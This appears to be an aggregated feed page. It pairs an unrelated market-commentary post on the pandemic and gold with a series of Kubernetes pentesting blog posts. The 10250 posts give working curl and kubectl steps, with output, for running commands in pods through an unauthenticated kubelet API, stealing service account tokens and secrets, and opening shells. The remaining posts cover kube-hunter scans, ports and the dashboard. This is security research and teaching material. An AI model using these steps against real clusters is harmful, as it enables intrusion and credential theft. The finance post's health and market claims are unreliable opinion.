Categories
Business buying now buying the dips Cloud Company CRISIS deep recession demand election equities experts Fear Forecasting health facilities healthy hospitals Intelwars markets Opinions pandemic panic recovery Stock Market Vaccine

PANDEMIC PANIC: 2nd Wave Climax – FED CRIPPLED!

This article was contributed by Lior Gantz of the Wealth Research Group. 

What NO ONE expects is a deep recession; there are a number of CONFLICTING THEORIES as to what the recovery will look like, but nothing about entering a recession. The consensus is that the pandemic is highly contagious, but not lethal; “with a vaccine coming and FEAR LEVELS subsiding, a recovery has begun,” is the general idea.

Where OPINIONS DIFFER is about its strength and inclusiveness of the recovery:

  1. Dichotomy – This is the thesis that claims BIG BUSINESS is eating up SMALL BUSINESS, so the recovery is HAPPENING, but it isn’t a healthy one. We’ll see GDP printing better stats with each PASSING QUARTER, but poverty is increasing, since BIG gets BIGGER and small gets TINY.
  2. Vaccine-Dependent – This camp believes that the PENT-UP DEMAND will be unleashed, once first-responders agree to take the vaccine. That stamp of approval will LEAD to CONFIDENCE worldwide; I want to show you how much DISTRUST THERE IS in the value stocks, which are companies that dominate their industries but are growing slowly and predictably, not fast and sporadically.

The market believes that each company that isn’t on the cloud is going out of business, which has led to a bubble:

Courtesy: Zerohedge.com

You should consider THE FACTS about the pandemic before I move on to the THIRD CAMP, which are the investors who believe in the “V”-shaped or quick “U”-shaped recovery. They’re BUYING DIPS, as I am right now, following our FOUR WATCH LISTS: 1, 2, 3, and TECH.

The MOST IMPORTANT fact is that the PANDEMIC ITSELF isn’t lethal; the real crisis is overwhelmed hospitals and insufficient medical staff.

While no one likes to see CROWDED HEALTH FACILITIES, if those do return, this would be nowhere near the panic levels of March, when healthy people feared FOR THEIR LIVES.

Therefore, to expect markets to price in MARCH LOWS is a bit of a stretch of the imagination.

Instead, be agile in your thinking; there are REAL BARGAINS out there. Flexibility is needed, though. Don’t wait for sellers to hand you once-in-a-generation prices for the second time in six months.

Courtesy: Zerohedge.com

As you can see, tight presidential races WEIGH ON PRICES, since it’s a huge unknown factor, especially when the parties are THIS POLARIZED on policy and public ideas.

It’s a tale of two Americas with two opposite agendas.

Where does gold come into the picture?

  1. Slow “V” or Fast “U” – Those who are FREE-MARKET oriented understand that businesses have muscled through the ROUGH PATCH and that capitalistic forces are driving innovation in this post-COVID-19 reality.

Wall Street and institutional money will be ENTERING EQUITIES on this severe dip and you ought to know that BUYING NOW is playing with fire, but I am certainly am.

Gold stocks have also reached their MOMENT OF TRUTH:

Courtesy: U.S. Global Investors

They MUST PENETRATE below the average of 2.5; that will signal a MULTI-YEAR TREND, which will confirm the bull market. The fact that Kinross and Newmont, among other large-cap miners, are RAISING DIVIDENDS, is a healthy sign of confidence from the most reputable management teams out there.

The September dip has allowed us to find companies with GREAT SUPPORT and I’m going to present new stock profiles, since, as the chart above shows, we’re ON THE CUSP of the REAL MOVE.

Gold might sell in this panic even further, but that’s not the REAL TREND; think ahead by 6-12 months and you’ll realize that inflation is accelerating!

The post PANDEMIC PANIC: 2nd Wave Climax – FED CRIPPLED! first appeared on SHTF Plan – When It Hits The Fan, Don't Say We Didn't Warn You.

Share
Categories
Cloud devoops hacking Intelwars Kubernetes Pentesting

Kubernetes: unauth kublet API 10250 basic code exec

Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it’s still pretty common to find it exposed via the “insecure API service” option.

Everybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.
# /run/%namespace%/%pod_name%/%container_name%
example:
$ curl -k -XPOST “https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter” -d “cmd=ls -la /”

total 12
drwxr-xr-x   13 root     root           148 Aug 26 11:31 .
drwxr-xr-x   13 root     root           148 Aug 26 11:31 ..
-rwxr-xr-x    1 root     root             0 Aug 26 11:31 .dockerenv
drwxr-xr-x    2 root     root          8192 May  5 22:22 bin
drwxr-xr-x    5 root     root           380 Aug 26 11:31 dev
drwxr-xr-x    3 root     root           135 Aug 26 11:31 etc
drwxr-xr-x    2 nobody   nogroup          6 Mar 18 16:38 home
drwxr-xr-x    2 root     root             6 Apr 23 11:17 lib
dr-xr-xr-x  353 root     root             0 Aug 26 07:14 proc
drwxr-xr-x    2 root     root             6 Mar 18 16:38 root
dr-xr-xr-x   13 root     root             0 Aug 26 15:12 sys
drwxrwxrwt    2 root     root             6 Mar 18 16:38 tmp
drwxr-xr-x    4 root     root            31 Apr 23 11:17 usr
drwxr-xr-x    5 root     root            41 Aug 26 11:31 var
Here is how to get all secrets which container uses (environment variables – commons to see kublet tokens here):
$ curl -k -XPOST “https://k8s-node-1:10250/run/kube-system//” -d “cmd=env”
The list of all pods and containers which were scheduled on the Kubernetes worker node could be retrieved using command below:
$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool
or
$ curl –insecure  https://k8s-node-1:10250/runningpods | jq
Example 1:
curl –insecure  https://1.2.3.4:10250/runningpods | jq
Output:
Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)
Example 2:
curl –insecure  https://1.2.3.4:10250/runningpods | jq
Output:
Unauthorized
Example 3:
curl –insecure  https://1.2.3.4:10250/runningpods | jq
Output:
{
  “kind”: “PodList”,
  “apiVersion”: “v1”,
  “metadata”: {},
  “items”: [
    {
      “metadata”: {
        “name”: “kube-dns-5b8bf6c4f4-k5n2g”,
        “generateName”: “kube-dns-5b8bf6c4f4-“,
        “namespace”: “kube-system”,
        “selfLink”: “/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g”,
        “uid”: “63438841-e43c-11e8-a104-42010a80038e”,
        “resourceVersion”: “85366060”,
        “creationTimestamp”: “2018-11-09T16:27:44Z”,
        “labels”: {
          “k8s-app”: “kube-dns”,
          “pod-template-hash”: “1646927090”
        },
        “annotations”: {
          “kubernetes.io/config.seen”: “2018-11-09T16:27:44.990071791Z”,
          “kubernetes.io/config.source”: “api”,
          “scheduler.alpha.kubernetes.io/critical-pod”: “”
        },
        “ownerReferences”: [
          {
            “apiVersion”: “extensions/v1beta1”,
            “kind”: “ReplicaSet”,
            “name”: “kube-dns-5b8bf6c4f4”,
            “uid”: “633db9d4-e43c-11e8-a104-42010a80038e”,
            “controller”: true
          }
        ]
      },
      “spec”: {
        “volumes”: [
          {
            “name”: “kube-dns-config”,
            “configMap”: {
              “name”: “kube-dns”,
              “defaultMode”: 420
            }
          },
          {
            “name”: “kube-dns-token-xznw5”,
            “secret”: {
              “secretName”: “kube-dns-token-xznw5”,
              “defaultMode”: 420
            }
          }
        ],
        “containers”: [
          {
            “name”: “dnsmasq”,
            “image”: “gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10”,
            “args”: [
              “-v=2”,
              “-logtostderr”,
              “-configDir=/etc/k8s/dns/dnsmasq-nanny”,
              “-restartDnsmasq=true”,
              “–“,
              “-k”,
              “–cache-size=1000”,
              “–no-negcache”,
              “–log-facility=-“,
              “–server=/cluster.local/127.0.0.1#10053”,
              “–server=/in-addr.arpa/127.0.0.1#10053”,
              “–server=/ip6.arpa/127.0.0.1#10053”
            ],
            “ports”: [
              {
                “name”: “dns”,
                “containerPort”: 53,
                “protocol”: “UDP”
              },
              {
                “name”: “dns-tcp”,
                “containerPort”: 53,
                “protocol”: “TCP”
              }
            ],
            “resources”: {
              “requests”: {
                “cpu”: “150m”,
                “memory”: “20Mi”
              }
            },
            “volumeMounts”: [
              {
                “name”: “kube-dns-config”,
                “mountPath”: “/etc/k8s/dns/dnsmasq-nanny”
              },
              {
                “name”: “kube-dns-token-xznw5”,
                “readOnly”: true,
                “mountPath”: “/var/run/secrets/kubernetes.io/serviceaccount”
              }
            ],
            “livenessProbe”: {
              “httpGet”: {
                “path”: “/healthcheck/dnsmasq”,
                “port”: 10054,
                “scheme”: “HTTP”
              },
              “initialDelaySeconds”: 60,
              “timeoutSeconds”: 5,
              “periodSeconds”: 10,
              “successThreshold”: 1,
              “failureThreshold”: 5
            },
            “terminationMessagePath”: “/dev/termination-log”,
            “imagePullPolicy”: “IfNotPresent”
          },
        ——–SNIP———
With the output of the running pods command you can craft your command to do the code exec
$ curl -k -XPOST “https://k8s-node-1:10250/run///” -d “cmd=env”

as an example:

leaves you with:
curl -k -XPOST “https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq” -d “cmd=ls -la /”
total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  125 root     root             0 Nov  9 16:27 proc
drwx——    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Nov  9 16:27 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var
Share
Categories
Cloud devoops hacking Intelwars Kubernetes Pentesting

Kubernetes: unauth kublet API 10250 token theft & kubectl

Kubernetes: unauthenticated kublet API (10250) token theft & kubectl access & exec

kube-hunter output to get us started:

do a curl -s https://k8-node:10250/runningpods/ to get a list of running pods

With that data, you can craft your post request to exec within a pod so we can poke around.

 Example request:

curl -k -XPOST “https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq” -d “cmd=ls -la /”

Output:
total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  134 root     root             0 Nov  9 16:27 proc
drwx——    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var

Check the env and see if the kublet tokens are in the environment variables. depending on the cloud provider or hosting provider they are sometimes right there. Otherwise we need to retrieve them from:
1. the mounted folder
2. the cloud metadata url

Check the env with the following command:

curl -k -XPOST “https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq” -d “cmd=env”

We are looking for the KUBLET_CERT, KUBLET_KEY, & CA_CERT environment variables.

We are also looking for the kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:
KUBERNETES_PORT=tcp://10.10.10.10:443
or
KUBERNETES_MASTER_NAME: 10.11.12.13:443
Once we get the kubernetes tokens or keys we need to talk to the API server to use them. The kublet (10250) wont know what to do with them.  This may be (if we are lucky) another public IP or a 10. IP.  If it’s a 10. IP we need to download kubectl to the pod.
Assuming it’s not in the environment variables let’s look and see if they are there in the mounted secrets
curl -k -XPOST “https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq” -d “cmd=mount”

sample output truncated:
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)
tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)

We can then cat out the ca.cert, namespace, and token

curl -k -XPOST “https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq” -d “cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount”

Output:

total 4
drwxrwxrwt    3 root     root         140 Nov  9 16:27 .
drwxr-xr-x    3 root     root        4.0K Nov  9 16:27 ..
lrwxrwxrwx    1 root     root          13 Nov  9 16:27 ca.crt -> ..data/ca.crt
lrwxrwxrwx    1 root     root          16 Nov  9 16:27 namespace -> ..data/namespace
lrwxrwxrwx    1 root     root          12 Nov  9 16:27 token -> ..data/token

and then:

curl -k -XPOST “https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq” -d “cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token”

output:

eyJhbGciOiJSUzI1NiI—SNIP—

Also grab the ca.crt 🙂

With the token, ca.crt and api server IP address we can issue commands with kubectl.

$ kubectl –server=https://1.2.3.4 –certificate-authority=ca.crt –token=eyJhbGciOiJSUzI1NiI—SNIP— get pods –all-namespaces

Output:

NAMESPACE     NAME                                                            READY     STATUS    RESTARTS   AGE
kube-system   event-exporter-v0.1.9-5c-SNIP                          2/2       Running   2          120d
kube-system   fluentd-cloud-logging-gke-eeme-api-default-pool   1/1       Running   1          2y
kube-system   heapster-v1.5.2-5-SNIP                              3/3       Running   0          27d
kube-system   kube-dns-5b8-SNIP                                       4/4       Running   0          61d
kube-system   kube-dns-autoscaler-2-SNIP                             1/1       Running   1          252d
kube-system   kube-proxy-gke-eeme-api-default-pool              1/1       Running   1          2y 
kube-system   kubernetes-dashboard-7-SNIP                           1/1       Running   0          27d
kube-system   l7-default-backend-10-SNIP                            1/1       Running   0          27d
kube-system   metrics-server-v0.2.1-7-SNIP                         2/2       Running   0          120d

at this point you can pull secrets or exec into any available pods

$ kubectl –server=https://1.2.3.4 –certificate-authority=ca.crt –token=eyJhbGciOiJSUzI1NiI—SNIP— get secrets –all-namespaces

to get a shell via kubectl

$ kubectl –server=https://1.2.3.4 –certificate-authority=ca.crt –token=eyJhbGciOiJSUzI1NiI—SNIP— get pods –namespace=kube-system

NAME                                                            READY     STATUS    RESTARTS   AGE
event-exporter-v0.1.9-5-SNIP               2/2       Running   2          120d
–SNIP–
metrics-server-v0.2.1-7f8ee58c8f-ab13f     2/2       Running   0          120d

$ kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f –namespace=kube-system–server=https://1.2.3.4  –certificate-authority=ca.crt –token=eyJhbGciOiJSUzI1NiI—SNIP— /bin/sh

/ # ls -lah
total 40220
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 .
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 ..
-rwxr-xr-x    1 root     root           0 Sep 11 07:25 .dockerenv
drwxr-xr-x    3 root     root        4.0K Sep 11 07:25 apiserver.local.config
drwxr-xr-x    2 root     root       12.0K Sep 11 07:24 bin
drwxr-xr-x    5 root     root         380 Sep 11 07:25 dev
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 etc
drwxr-xr-x    2 nobody   nogroup     4.0K Nov  1  2017 home
-rwxr-xr-x    2 root     root       39.2M Dec 20  2017 metrics-server
dr-xr-xr-x  135 root     root           0 Sep 11 07:25 proc
drwxr-xr-x    1 root     root        4.0K Dec 19 21:33 root
dr-xr-xr-x   12 root     root           0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root        4.0K Oct 18 13:57 tmp
drwxr-xr-x    3 root     root        4.0K Sep 11 07:24 usr
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 var

For completeness if you got the keys via the environment variables the kubectl command would be something like this:

kubectl –server=https://1.2.3.4 –certificate-authority=ca.crt –client-key=kublet.key –client-certificate=kublet.crt get pods –all-namespaces


Share
Categories
Cloud devoops hacking Intelwars Kubernetes Pentesting

Kubernetes: Kube-Hunter 10255

Below is some sample output that mainly is here to see what open 10255 will give you and look like.  What probably of most interest is the /pods endpoint



or the /metrics endpoint

or the /stats endpoint



$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ‘,’): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services…
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:443
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:6443
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Kubelet API (readonly):
|   type: open service
|   service: Kubelet API (readonly)
|_  host: 1.2.3.4:10255
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster’s possible exploits, secrets and more.
|
| K8s Version Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     The kubernetes version could be obtained
|_    from logs in the /metrics endpoint
|
| Privileged Container:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     A Privileged container exist on a node.
|     could expose the node/cluster to unwanted root
|_    operations
|
| Cluster Health Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     By accessing the open /healthz handler, an
|     attacker could get the cluster health state without
|_    authenticating
|
| Exposed Pods:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     An attacker could view sensitive information
|     about pods that are bound to a Node using
|_    the /pods endpoint

———-

Nodes
+————-+—————+
| TYPE        | LOCATION      |
+————-+—————+
| Node/Master | 1.2.3.4    |
+————-+—————+

Detected Services
+———————-+———————+———————-+
| SERVICE              | LOCATION            | DESCRIPTION          |
+———————-+———————+———————-+
| Kubelet API          | 1.2.3.4:10255       | The read-only port   |
| (readonly)           |                     | on the kubelet       |
|                      |                     | serves health        |
|                      |                     | probing endpoints,   |
|                      |                     | and is relied upon   |
|                      |                     | by many kubernetes   |
|                      |                     | componenets          |
+———————-+———————+———————-+
| Etcd                 | 1.2.3.4:2379        | Etcd is a DB that    |
|                      |                     | stores cluster’s     |
|                      |                     | data, it contains    |
|                      |                     | configuration and    |
|                      |                     | current state        |
|                      |                     | information, and     |
|                      |                     | might contain        |
|                      |                     | secrets              |
+———————-+———————+———————-+
| API Server           | 1.2.3.4:6443        | The API server is in |
|                      |                     | charge of all        |
|                      |                     | operations on the    |
|                      |                     | cluster.             |
+———————-+———————+———————-+
| API Server           | 1.2.3.4:443         | The API server is in |
|                      |                     | charge of all        |
|                      |                     | operations on the    |
|                      |                     | cluster.             |
+———————-+———————+———————-+

Vulnerabilities
+———————+———————-+———————-+———————-+———————-+
| LOCATION            | CATEGORY             | VULNERABILITY        | DESCRIPTION          | EVIDENCE             |
+———————+———————-+———————-+———————-+———————-+
| 1.2.3.4:2379        | Unauthenticated      | Etcd is accessible   | Etcd is accessible   | {“etcdserver”:”2.3.8 |
|                     | Access               | using insecure       | using HTTP (without  | “,”etcdcluster”:”2.3 |
|                     |                      | connection (HTTP)    | authorization and    | …                  |
|                     |                      |                      | authentication), it  |                      |
|                     |                      |                      | would allow a        |                      |
|                     |                      |                      | potential attacker   |                      |
|                     |                      |                      | to                   |                      |
|                     |                      |                      |      gain access to  |                      |
|                     |                      |                      | the etcd             |                      |
+———————+———————-+———————-+———————-+———————-+
| 1.2.3.4:2379        | Information          | Etcd Remote version  | Remote version       | {“etcdserver”:”2.3.8 |
|                     | Disclosure           | disclosure           | disclosure might     | “,”etcdcluster”:”2.3 |
|                     |                      |                      | give an attacker a   | …                  |
|                     |                      |                      | valuable data to     |                      |
|                     |                      |                      | attack a cluster     |                      |
+———————+———————-+———————-+———————-+———————-+
| 1.2.3.4:10255       | Information          | K8s Version          | The kubernetes       | v1.5.6-rc17          |
|                     | Disclosure           | Disclosure           | version could be     |                      |
|                     |                      |                      | obtained from logs   |                      |
|                     |                      |                      | in the /metrics      |                      |
|                     |                      |                      | endpoint             |                      |
+———————+———————-+———————-+———————-+———————-+
| 1.2.3.4:10255       | Information          | Exposed Pods         | An attacker could    | count: 68            |
|                     | Disclosure           |                      | view sensitive       |                      |
|                     |                      |                      | information about    |                      |
|                     |                      |                      | pods that are bound  |                      |
|                     |                      |                      | to a Node using the  |                      |
|                     |                      |                      | /pods endpoint       |                      |
+———————+———————-+———————-+———————-+———————-+
| 1.2.3.4:10255       | Information          | Cluster Health       | By accessing the     | status: ok           |
|                     | Disclosure           | Disclosure           | open /healthz        |                      |
|                     |                      |                      | handler, an attacker |                      |
|                     |                      |                      | could get the        |                      |
|                     |                      |                      | cluster health state |                      |
|                     |                      |                      | without              |                      |
|                     |                      |                      | authenticating       |                      |
+———————+———————-+———————-+———————-+———————-+
| 1.2.3.4:2379        | Access Risk          | Etcd Remote Read     | Remote read access   | {“action”:”get”,”nod |
|                     |                      | Access Event         | might expose to an   | e”:{“dir”:true,”node |
|                     |                      |                      | attacker cluster’s   | …                  |
|                     |                      |                      | possible exploits,   |                      |
|                     |                      |                      | secrets and more.    |                      |
+———————+———————-+———————-+———————-+———————-+
| 1.2.3.4:10255       | Access Risk          | Privileged Container | A Privileged         | pod: node-exporter-  |
|                     |                      |                      | container exist on a | 1fmd9-z9685,         |
|                     |                      |                      | node. could expose   | containe…          |
|                     |                      |                      | the node/cluster to  |                      |
|                     |                      |                      | unwanted root        |                      |
|                     |                      |                      | operations           |                      |
+———————+———————-+———————-+———————-+———————-+

Share
Categories
Cloud devoops hacking Intelwars Kubernetes Pentesting

Kubernetes: List of ports

Other Kubernetes ports

What are some of the visible ports used in Kubernetes?


  • 44134/tcp – Helmtiller, weave, calico
  • 10250/tcp – kubelet (kublet exploit)
    • No authN, completely open
    • /pods
    • /runningpods
    • /containerLogs
  • 10255/tcp – kublet port (read-only)
    • /stats
    • /metrics
    • /pods
  • 4194/tcp – cAdvisor
  • 2379/tcp – etcd (see it on other ports though)
    • Etcd holds all the configs
    • Config storage
  • 30000 – dashboard
  • 443/6443 – api
Share
Categories
Cloud devoops hacking Intelwars Kubernetes Pentesting

Kubernetes: Kubelet API containerLogs endpoint

How to get the info that kube-hunter reports for open /containerLogs endpoint



Vulnerabilities
+—————+————-+——————+———————-+—————-+
| LOCATION       CATEGORY     | VULNERABILITY    | DESCRIPTION          | EVIDENCE       |
+—————+————-+——————+———————-+—————-+
+—————-+————+——————+———————-+—————-+
| 1.2.3.4:10250 | Information | Exposed Container| Output logs from a   |                |
|               | Disclosure  | Logs             | running container    |                |
|               |             |                  | are using the        |                |
|               |             |                  | exposed              |                |
|               |             |                  | /containerLogs       |                |
|               |             |                  | endpoint             |                |
+—————+————-+——————+———————-+—————-+

First step, grab the output from /runningpods/ example below:


You’ll need the namespace, pod name and container name.

Thus given the below runningpods output:

{"metadata":{"name":"monitoring-influxdb-grafana-v4-6679c46745-zhvjw","namespace":"kube-system","uid":"0d22cdad-06e5-11e9-a7f3-6ac885fbc092","creationTimestamp":null},"spec":{"containers":[{"name":"grafana","image":"sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7","resources":{}},{"name":"influxdb","image":"sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c","resources":{}}]},


turns into:


https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafana


and

https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/influxdb



Share
Categories
Cloud devoops hacking Intelwars Kubernetes Pentesting

Kubernetes: Kubernetes Dashboard

Tesla was famously hacked for leaving this open and it’s pretty rare to find it exposed externally now but useful to know what it is and what you can do with it.

Usually found on port 30000

kube-hunter finding for it:

Vulnerabilities
+———————–+—————+———————-+———————-+——————+
| LOCATION              | CATEGORY      | VULNERABILITY        | DESCRIPTION          | EVIDENCE         |
+———————–+—————+———————-+———————-+——————+
| 1.2.3.4:30000         | Remote Code   | Dashboard Exposed    | All oprations on the | nodes: pach-okta |
|                       | Execution     |                      | cluster are exposed  |                  |
+———————–+—————+———————-+———————-+——————+

Why do you care?  It has access to all pods and secrets within the cluster. So rather than using command line tools to get secrets or run code you can just do it in a web browser.

Screenshots of what it looks like:

viewing secrets



utilization



logs
shells

Share
Categories
Cloud devoops hacking Intelwars Kubernetes Pentesting

Kubernetes: Master Post

I have a few Kubernetes posts queued up and will make this the master post to index and give references for the topic. If i’m missing blog posts or useful resources ping me here or twitter.

Talks you should watch if you are interested in Kubernetes:

Hacking and Hardening Kubernetes Clusters by Example [I] – Brad Geesaman

https://www.youtube.com/watch?v=vTgQLzeBfRU
https://github.com/bgeesaman/
https://github.com/bgeesaman/hhkbe [demos for the talk above]
https://schd.ws/hosted_files/kccncna17/d8/Hacking%20and%20Hardening%20Kubernetes%20By%20Example%20v2.pdf [slide deck]

Perfect Storm Taking the Helm of Kubernetes Ian Coldwater

https://www.youtube.com/watch?v=1k-GIDXgfLw

A Hacker’s Guide to Kubernetes and the Cloud – Rory McCune
https://www.youtube.com/watch?v=dxKpCO2dAy8
Shipping in Pirate-Infested Waters: Practical Attack and Defense in Kubernetes

https://www.youtube.com/watch?v=ohTq0no0ZVU

Blog posts by others:

https://techbeacon.com/hackers-guide-kubernetes-security
https://elweb.co/the-security-footgun-in-etcd/
https://www.4armed.com/blog/hacking-kubelet-on-gke/
https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/
https://www.4armed.com/blog/hacking-digitalocean-kubernetes/
https://github.com/freach/kubernetes-security-best-practice
https://neuvector.com/container-security/kubernetes-security-guide/
https://medium.com/@pczarkowski/the-kubernetes-api-call-is-coming-from-inside-the-cluster-f1a115bd2066
https://blog.intothesymmetry.com/2018/12/persistent-xsrf-on-kubernetes-dashboard.html
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/
https://raesene.github.io/blog/2017/04/02/Kubernetes-Service-Tokens/
https://www.cyberark.com/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions/
https://labs.mwrinfosecurity.com/blog/attacking-kubernetes-through-kubelet/
https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/

Auditing tools

https://github.com/Shopify/kubeaudit
https://github.com/aquasecurity/kube-bench
https://github.com/aquasecurity/kube-hunter

CVE-2018-1002105 resources

https://blog.appsecco.com/analysing-and-exploiting-kubernetes-apiserver-vulnerability-cve-2018-1002105-3150d97b24bb
https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/
https://github.com/gravitational/cve-2018-1002105
https://github.com/evict/poc_CVE-2018-1002105

CG Posts:

Open Etcd: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-open-etcd.html
Etcd with kube-hunter: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunterpy-etcd.html
cAdvisor: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-cadvisor.html

Kubernetes ports: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html
Kubernetes dashboards: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubernetes-dashboard.html
Kublet 10255: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html
Kublet 10250
     – Container Logs: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubelet-api-containerlogs.html
     – Getting shellz 1: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html
     – Getting shellz 2: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html

Cloud Metadata Urls and Kubernetes

-I’ll update as they get posted

Share
Categories
Cloud devoops hacking Intelwars Kubernetes Pentesting

Kubernetes: kube-hunter.py etcd


I mentioned in the master post one a few auditing tools that exist. Kube-Hunter is one that is pretty ok.  You can use this to quickly scan for multiple kubernetes issues.


Example run:
$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ‘,’): 1.2.3.4
~ Started
